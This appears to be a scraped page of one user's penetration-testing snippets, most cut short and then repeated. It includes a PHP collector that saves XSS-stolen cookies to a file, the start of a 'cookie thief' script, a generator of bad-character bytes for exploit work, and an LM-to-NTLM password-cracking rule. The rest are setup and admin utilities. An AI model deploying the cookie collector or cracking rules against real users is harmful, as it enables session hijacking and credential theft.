BBK BeanBagKing

## simple_cookie.php
<?php
$cookie = $_GET["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>

## cookie_thief.php
<?php

// I've seen this code in several articles, the earliest of which that I've seen is here:
// http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
// This is just a copy with correct formatting (no curly quotes) and source attribution.
// I've also modified it just slightly to remove warnings when null values are passed to METHOD and REMOTE_HOST
// and added proper line breaks.

function GetIP()
{

## new_setup.sh
#!/bin/bash

YEL='\033[1;33m'
RED='\033[1;31m'
GRN='\033[1;32m'
NC='\033[0m' # No Color

# This script assumes you've already taken the necessary initial steps to setup network connectivity and install vmware tools
# You probably want at least open-vm-tools-desktop to copy and paste this script and/or the URL to wget it.
echo -e "${YEL}--${NC}Starting script, installing commonly used programs"

## decode.sh
#!/bin/bash

string=$1
YEL='\033[1;33m'
NC='\033[0m' # No Color

if [ -z $string ]; then
    echo "Usage: `basename $0` [BASE64 STRING]"
    exit 1
fi

## scripts_update.sh
#!/bin/bash

#######
# Creates a flat text file list of NSE scripts suitable for searching via command line
# Used in conjunction with nsesearch.sh
# Replaces nmap_scripts.list gist
# Dependencies: html2text
#######

YEL='\033[1;33m'

## detectFolder.ps1
# For servers in list, check if the folder exists
# Useful for detecting user folders, installed programs, etc.
Get-Content C:\Users\UserName\Desktop\DetectFolder\servers.txt | `
   Select-Object @{Name='ComputerName';Expression={$_}},@{Name='FolderExist';Expression={ Test-Path "\\$_\c$\program files"}}

## mapDrive.ps1
# This was, ideally, a way to map SharePoint drives as network drives in Windows. I don't believe I ever got it working, but maybe
# it will come in handy for someone.


# http://community.office365.com/en-us/f/173/t/286802.aspx
# Reference the above for "steps"


# Adds sharepoint.com to the list of trusted sites
# AKA Step 1

## hexchars.py
import sys
for x in range(1,256):
	sys.stdout.write("\\x" + '{:02x}'.format(x))

## lmNTLM.rule
## BBK 13 Mar 2016
## Takes a LM hash (which is 14 characters max, and has no lowercase), and toggles cases to generate possible NTLM hashes.

## Lets try to get lucky: Do nothing, lowercase all, uppercase all, capitalise first lowercase rest, lowercase first capital rest.
## These possibilites will also be contained below. As I said, trying to get lucky. Also, sanity check.

:
l
u
c

## nslookup.bat
REM Performs nslookup on a list of IP's
for /F %i in (iplist.txt) do @nslookup %i 8.8.8.8 2>nul | find "Name" && echo %i
	<?php
	$cookie = $_GET["cookie"];
	$steal = fopen("cookiefile.txt", "a");
	fwrite($steal, $cookie ."\n");
	fclose($steal);
	?>
	<?php

	// I've seen this code in several articles, the earliest of which that I've seen is here:
	// http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
	// This is just a copy with correct formatting (no curly quotes) and source attribution.
	// I've also modified it just slightly to remove warnings when null values are passed to METHOD and REMOTE_HOST
	// and added proper line breaks.

	function GetIP()
	{
	#!/bin/bash

	YEL='\033[1;33m'
	RED='\033[1;31m'
	GRN='\033[1;32m'
	NC='\033[0m' # No Color

	# This script assumes you've already taken the necessary initial steps to setup network connectivity and install vmware tools
	# You probably want at least open-vm-tools-desktop to copy and paste this script and/or the URL to wget it.
	echo -e "${YEL}--${NC}Starting script, installing commonly used programs"
	#!/bin/bash

	string=$1
	YEL='\033[1;33m'
	NC='\033[0m' # No Color

	if [ -z $string ]; then
	echo "Usage: `basename $0` [BASE64 STRING]"
	exit 1
	fi
	#!/bin/bash

	#######
	# Creates a flat text file list of NSE scripts suitable for searching via command line
	# Used in conjunction with nsesearch.sh
	# Replaces nmap_scripts.list gist
	# Dependencies: html2text
	#######

	YEL='\033[1;33m'
	# For servers in list, check if the folder exists
	# Useful for detecting user folders, installed programs, etc.
	Get-Content C:\Users\UserName\Desktop\DetectFolder\servers.txt \| `
	Select-Object @{Name='ComputerName';Expression={$_}},@{Name='FolderExist';Expression={ Test-Path "\\$_\c$\program files"}}
	# This was, ideally, a way to map SharePoint drives as network drives in Windows. I don't believe I ever got it working, but maybe
	# it will come in handy for someone.


	# http://community.office365.com/en-us/f/173/t/286802.aspx
	# Reference the above for "steps"


	# Adds sharepoint.com to the list of trusted sites
	# AKA Step 1
	import sys
	for x in range(1,256):
	sys.stdout.write("\\x" + '{:02x}'.format(x))
	## BBK 13 Mar 2016
	## Takes a LM hash (which is 14 characters max, and has no lowercase), and toggles cases to generate possible NTLM hashes.

	## Lets try to get lucky: Do nothing, lowercase all, uppercase all, capitalise first lowercase rest, lowercase first capital rest.
	## These possibilites will also be contained below. As I said, trying to get lucky. Also, sanity check.

	:
	l
	u
	c
	REM Performs nslookup on a list of IP's
	for /F %i in (iplist.txt) do @nslookup %i 8.8.8.8 2>nul \| find "Name" && echo %i